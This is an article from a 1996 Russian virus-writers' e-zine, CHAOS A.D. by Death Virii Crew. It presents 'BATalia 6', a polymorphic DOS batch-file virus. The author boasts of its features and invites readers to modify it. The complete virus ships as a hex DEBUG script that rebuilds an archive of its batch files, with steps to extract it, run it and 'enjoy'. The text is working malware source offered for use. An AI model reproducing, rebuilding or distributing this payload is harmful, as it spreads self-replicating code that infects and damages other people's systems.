[Death Virii Crew] Presents
CHAOS A.D. Vmag, Issue 2, Summer 1996                           file 001


                     Полиморфный Вирус на BAT языке

                              BATalia 6

Достоинства
 - Написан исключительно на внутренних командах DOS`a. (исключение - ARJ)
 - Никаких вставок на ASM
 - Инсталлируется из одного файла
 - Не таскает за собой все зараженные файлы
 - Проверка на повторное заражение
 - Корректная работа с ECHO (ON / OFF)
 - Не выдает посторонних надписей на экран
 - Полиморфный !!!!!!!!

и Недостатки:
 - обязательно требуется ARJ в переменной PATH.
 - Обязательно наличие ОГРОМHОГО места в окружении (иначе - глюки)
 - Медленный сволочь  :)
 - Ограниченное число мутаций (в основном из за недостатка места в окружении)

и вообще:

  Вот и написал я наконец наверное финальную часть моей серии для BAT языка.
  Все. Быть может я продолжу работу в этом отношении если я смогу сделать
  РЕЗИДЕHТHЫЙ вирус на чисто BATовских средствах. Hо - пока такого изврата
  мне в голову не приходило. А пока - полиморфный вирус. Конечно, примитив
  есть примитив, но идея хороша. Реализовалось все за 3 дня. Hе знаю как
  Вам, но мне просто по кайфу. Вы можете добавить в процедуры полиморфности
  что либо свое. Особенно я предлагаю вам помучать мою процедурину RND.
  Место для вставок я оставил. Единственная просьба - не менять никаких
  текстовых строк в вирусе. Описание не прилагается по одной единственной
  причине - лениво. В крайнем случае, если вы не очень хорошо знаете BAT
  язык, то предлагаю поучиться ему читая описалово от BATaila5 - в первом
  выпуске CHAOS A.D.  Тело вируса состоит из 4 файлов. Файлик PACK.BAT - это
  инсталяционный файл. Он все запакует в один файл.  Экспериментриуйте.
  И единственная просьба - дайте побольше места в окружении. Если вы
  напишете SET и у вас заполнится полэкрана, то вирус скорее всего у вас
  работать не будет. :(( А вообще - писался он исключительно в
  демонстрационных целях. Запакован rar'ом 2.0 и превращен в дебаг-скрипт.
  Вытаскивайте и наслаждайтесь. :)))))))))))))))))))))))))))))))))))))))))

Вирус в виде дебаговского скрипта
Файл BATALIA6.SCR - файл вырезать и запустить так: DEBUG < BATALIA6.SCR
и получите в текущем каталоге файл BATALIA6.RAR
Потом распакуйте и радуйтесь жизни. :)

;================================ резать тут ============================
 N BATALIA6.RAR
 E 0100 52 61 72 21 1A 07 00 3B D0 73 08 00 0D 00 00 00
 E 0110 00 00 00 00 F5 41 74 00 80 24 00 E5 00 00 00 2E
 E 0120 01 00 00 00 0D 79 92 BE F0 B3 B6 20 14 35 04 00
 E 0130 20 00 00 00 52 55 4C 5A 0C 01 51 0C CC CC 00 00
 E 0140 15 57 DA 30 1F C3 E4 80 1A 23 B2 C4 D1 29 B7 64
 E 0150 42 A5 6A 8D A6 E3 15 A4 98 72 58 C3 16 D0 81 49
 E 0160 14 99 91 24 50 28 A8 DB 82 FD 5C F2 B2 40 2D F0
 E 0170 BE 12 59 6F C0 5A D5 8F E5 B5 3E 88 92 A5 CC CD
 E 0180 24 A2 5A 6E DB EB 40 28 14 73 73 73 79 B9 D7 77
 E 0190 73 7E 37 9B 99 BC E7 33 33 73 7E 0F EA 62 BE FB
 E 01A0 40 D5 9B 39 F9 D7 2C 07 8A AE C5 5D DE 77 1B AE
 E 01B0 8B 35 7B 88 25 4A FB 94 54 38 17 65 C0 9E 17 70
 E 01C0 5B 75 AC 31 6E 03 B0 18 5D BF 28 70 99 A9 72 AB
 E 01D0 2F 12 39 E3 85 16 04 B4 9B B0 36 87 E2 F6 ED 8D
 E 01E0 D1 DB BF 56 D5 5E 0E 76 30 BA 4A 3B E2 47 11 2E
 E 01F0 89 95 F5 20 11 35 2A 38 99 26 11 C4 92 DB A5 E8
 E 0200 C5 DF 42 F6 BA 04 95 08 11 2B D0 03 59 66 EB A4
 E 0210 6B 70 85 E5 B1 21 66 33 C0 A4 BC FC E0 31 B9 74
 E 0220 10 80 24 00 04 00 00 00 04 00 00 00 00 7E 72 99
 E 0230 6C 96 0E 21 00 14 35 04 00 20 00 00 00 5A 41 47
 E 0240 4C A7 BD 9F 9C E6 89 74 10 80 2C 00 20 04 00 00
 E 0250 B8 0B 00 00 00 AC D6 B2 08 1A 17 21 00 14 35 0C
 E 0260 00 20 00 00 00 42 41 54 41 4C 49 41 36 2E 42 41
 E 0270 54 9B D8 08 7C D6 61 E5 6F 87 91 96 D9 64 35 5B
 E 0280 63 81 D1 F9 39 EF 13 8E AD B1 3D B0 DB 58 2F 06
 E 0290 EB 4D DB 7C 5D D6 5F F9 F1 DE CB DA 0E C2 3B B6
 E 02A0 1B 81 45 E5 8F B4 C3 C7 D1 95 E0 21 86 BB E9 5F
 E 02B0 C8 25 2C 19 2E 71 96 AE BC 4B B6 B2 04 C6 4A DF
 E 02C0 2C 3C 14 1E 6F 64 C2 B9 C7 D5 7E 67 E3 78 F4 3C
 E 02D0 54 A0 36 9C 6F DA 28 86 D3 FD E2 A7 EB D2 A3 E0
 E 02E0 0E DD 7D 0F 8F 9F 1B 37 18 B8 F8 F9 09 6C 52 F9
 E 02F0 E8 D1 E6 FB 0F 89 76 70 E1 68 6D 6C D0 D4 94 24
 E 0300 3A 6C D9 0E D2 EA 2B DA 9D 3B A2 B3 DA 0B 4D 38
 E 0310 D1 3A CB 12 6E 6F 20 DE 6A DF 12 31 7D 04 46 EF
 E 0320 E5 79 22 C0 A8 A5 60 7C 7C 89 7C A4 FA 32 2D 61
 E 0330 E1 1C 5E 82 3F 8C 9E 3F 31 21 C9 91 41 19 63 85
 E 0340 91 72 6E 30 3F C5 12 C8 87 5C F2 26 2E 8B 21 1D
 E 0350 5B B2 A1 A8 5C 48 25 7F 1C 30 A6 A1 32 C6 B4 11
 E 0360 A0 87 9B 6C 61 53 1E 71 1A 55 38 6A D6 A2 1F 19
 E 0370 83 9A 56 A2 51 9B 18 C7 8A 48 84 BC 0A ED 63 F3
 E 0380 AB 43 3A 97 54 0B C9 C8 A3 5E B8 8F D7 A7 28 DE
 E 0390 4F 94 8C 94 AA 34 0F F9 85 9D EA C8 D8 E3 82 85
 E 03A0 A1 97 53 1F 9F 3D 2B D9 E8 1B 9A 20 BA 8D 3F E4
 E 03B0 EA 17 03 56 A5 43 87 11 04 A9 A7 A5 7E 69 CC D1
 E 03C0 B1 08 E8 D6 8C 1F DC 90 07 24 70 D0 CE FE 3A 81
 E 03D0 DD B4 A5 E5 24 87 12 DD DC 90 9F 1E 21 65 81 87
 E 03E0 B1 AC 64 68 4C E5 50 64 21 9E C1 64 EE 2C CE E2
 E 03F0 91 1C 13 37 23 1C 8F 15 3A 74 C2 9C B0 12 E7 69
 E 0400 47 3C B2 1C C4 59 54 35 A3 CD 32 74 50 6C 91 BC
 E 0410 03 9C F4 B0 33 5C DF 61 00 17 B1 60 2E 8E C9 77
 E 0420 1E F6 FB 58 D3 56 48 10 3B 74 65 5A 94 F3 78 AF
 E 0430 3C 02 6C A7 9E 23 40 3B A3 B6 9B B8 C7 0A F7 2F
 E 0440 5B 63 41 F0 CD 00 C6 1E 12 74 42 71 D0 77 23 10
 E 0450 45 60 B2 B2 26 19 10 99 8A 66 40 F0 71 9F A4 34
 E 0460 6F 07 D0 58 C2 55 81 2E 6C 98 75 61 D5 FD 74 41
 E 0470 25 65 D5 F0 EA DA FF 4F 2C 84 41 2C F1 B8 3B 8B
 E 0480 F9 98 AA A1 4D 12 95 60 83 93 4C DD 6A B0 AB B1
 E 0490 6D 2F 0C D0 1E 20 AF A1 49 59 17 A9 AF AE 8C 2C
 E 04A0 8A 4C 42 A3 5F C2 8E 59 46 66 22 9A 48 7A BE 1A
 E 04B0 99 A2 7A 58 92 B1 2C E2 C2 DC BF 7B 1A 50 B8 E6
 E 04C0 0D 1A E9 E3 F9 41 71 09 9B BE AD 7D 55 0D 48 80
 E 04D0 21 01 08 00 A6 62 D9 64 52 62 3F 90 03 1D 6A 87
 E 04E0 33 96 9A 5D 63 06 1C C7 AA 50 62 70 6B 13 1C 72
 E 04F0 2A 3A 40 9C CE 63 46 B5 55 A3 5F DF CC 60 56 25
 E 0500 2B 95 EF E6 2B EB 16 55 CA F8 33 33 F7 22 80 79
 E 0510 1E B8 1A B5 29 52 A1 4F 5A 50 FD EA 20 4A BD 64
 E 0520 07 71 0A 6F F9 C4 DE B2 02 B8 85 34 B0 11 F3 2F
 E 0530 9F 28 67 59 00 1C 42 26 03 2C 34 38 A0 98 9E F8
 E 0540 DA 79 AF F6 26 DE 9E F0 4F 2D 72 C7 D9 66 26 43
 E 0550 7B A9 BC 85 6D A7 4F 16 B0 A9 BB D8 B5 3D C2 E0
 E 0560 E6 FA 69 99 09 3E 68 E8 C4 56 1C 21 8B DC 27 81
 E 0570 FE 7F 4C 44 93 DE 82 4B FC 83 93 98 1A 25 27 F4
 E 0580 5F D0 54 71 73 47 19 7F 16 CD 23 4A C3 B1 E6 61
 E 0590 BB E6 05 E9 F7 7A FD DE FE 7B F7 2C C3 17 3D E3
 E 05A0 63 1D F4 BE 17 1F 19 03 48 F0 33 4D 11 DE 44 4F
 E 05B0 C0 7D 48 87 B7 D6 1E A0 FD 89 50 26 0F D4 56 3F
 E 05C0 1E 60 1F 07 BB C7 C9 84 7D 79 F8 71 2E 3C 27 F5
 E 05D0 D3 35 73 FA 1C 83 08 95 C6 93 98 70 C0 1F EC 0F
 E 05E0 D4 3D A1 00 86 3B 8E 7B 3D BE 93 64 0F F0 B5 47
 E 05F0 EC 0D 1A 4B 82 CE 5F D8 B8 61 BF 9C 0E BD 2D 6C
 E 0600 0E F7 F8 34 CF 81 FE 15 A0 5F 79 7A 56 12 5A 5E
 E 0610 68 AB 39 3F 34 64 A0 25 5E D8 DC A9 F6 6D 84 01
 E 0620 FB B5 37 36 B5 B7 76 75 A8 90 30 C3 7E 97 99 A6
 E 0630 71 60 EA 40 7D 3F 03 5C 20 AC BF 98 3E B6 58 F3
 E 0640 88 42 DA 6B 2B A5 DE 8A E3 4D 02 93 57 EB B5 C1
 E 0650 8D 3B 32 FB D2 F9 5A A8 1B 58 1C BF E6 1C 0E A4
 E 0660 C9 6B 4B 80 36 4F 85 58 F5 00 D6 22 B6 46 B2 3D
 E 0670 71 B5 AA 35 94 D1 49 AF 20 54 13 CE 85 14 E2 FB
 E 0680 07 E7 4A AE 50 ED D2 5F 1D 59 67 ED 57 BF DF D4
 E 0690 D0 F9 C8 74 10 80 2B 00 6B 00 00 00 B6 00 00 00
 E 06A0 00 AC 43 0B 09 73 01 21 00 14 35 0B 00 20 00 00
 E 06B0 00 45 58 41 4D 50 4C 45 2E 42 41 54 62 B9 4F F0
 E 06C0 F2 B1 51 B6 6D 1D 7A 3B 75 36 B7 A9 54 DC DB F0
 E 06D0 EC BE 46 C5 1A 74 77 28 78 F1 D8 AB 65 DA 5E ED
 E 06E0 AC 0B DA 60 3B 30 79 06 89 23 56 BB D3 CC 1D 07
 E 06F0 ED 95 2F 4E 57 7F 53 42 04 CA 17 4B A3 15 B6 2F
 E 0700 97 26 55 F0 36 DB 17 46 AB E6 7A 2A EE 3F 30 F4
 E 0710 C4 1A F0 47 9B D7 0F 30 C7 0B A7 2B 02 93 64 6F
 E 0720 98 B1 2B 3F 3B 3F 38 A3 69 74 10 80 29 00 17 00
 E 0730 00 00 3F 00 00 00 00 33 0A 6C AC 11 A5 B6 20 14
 E 0740 35 09 00 20 00 00 00 46 49 4E 41 4C 2E 42 41 54
 E 0750 7D 6C B5 8D 45 4B 3B EE 37 D2 EA 60 A2 A9 3E 65
 E 0760 A7 AB F7 E0 0D B1 70 10 2E 74 10 80 26 00 06 00
 E 0770 00 00 B6 00 00 00 00 AC 43 0B 09 73 01 21 00 14
 E 0780 35 06 00 20 00 00 00 4A 4A 2E 42 41 54 7C 8F FE
 E 0790 0D A6 70 0A B6 74 10 80 28 00 58 00 00 00 4B 01
 E 07A0 00 00 00 26 8B A8 FB C2 A0 B6 20 14 35 08 00 20
 E 07B0 00 00 00 50 41 43 4B 2E 42 41 54 8D DA 51 35 12
 E 07C0 D6 C0 EE B6 9A 9B 23 F5 C3 0F 2F 94 FE 1D 1E 11
 E 07D0 9C EE 5A B4 97 8C 60 6A 42 3B 5D C3 0D 94 23 31
 E 07E0 87 A1 49 93 44 10 4F 4E 43 FE DC F9 4F 92 90 BF
 E 07F0 48 E4 39 FA 6D 92 80 9C FA 4F 6A 99 3D A7 8C CE
 E 0800 55 A6 0B 59 6C 2F 95 19 3B D9 91 31 9C 25 86 2D
 E 0810 82 92 C0
 RCX
 0713
 W
 Q
;================================ резать тут ============================


                                        (c) by Reminder [DVC]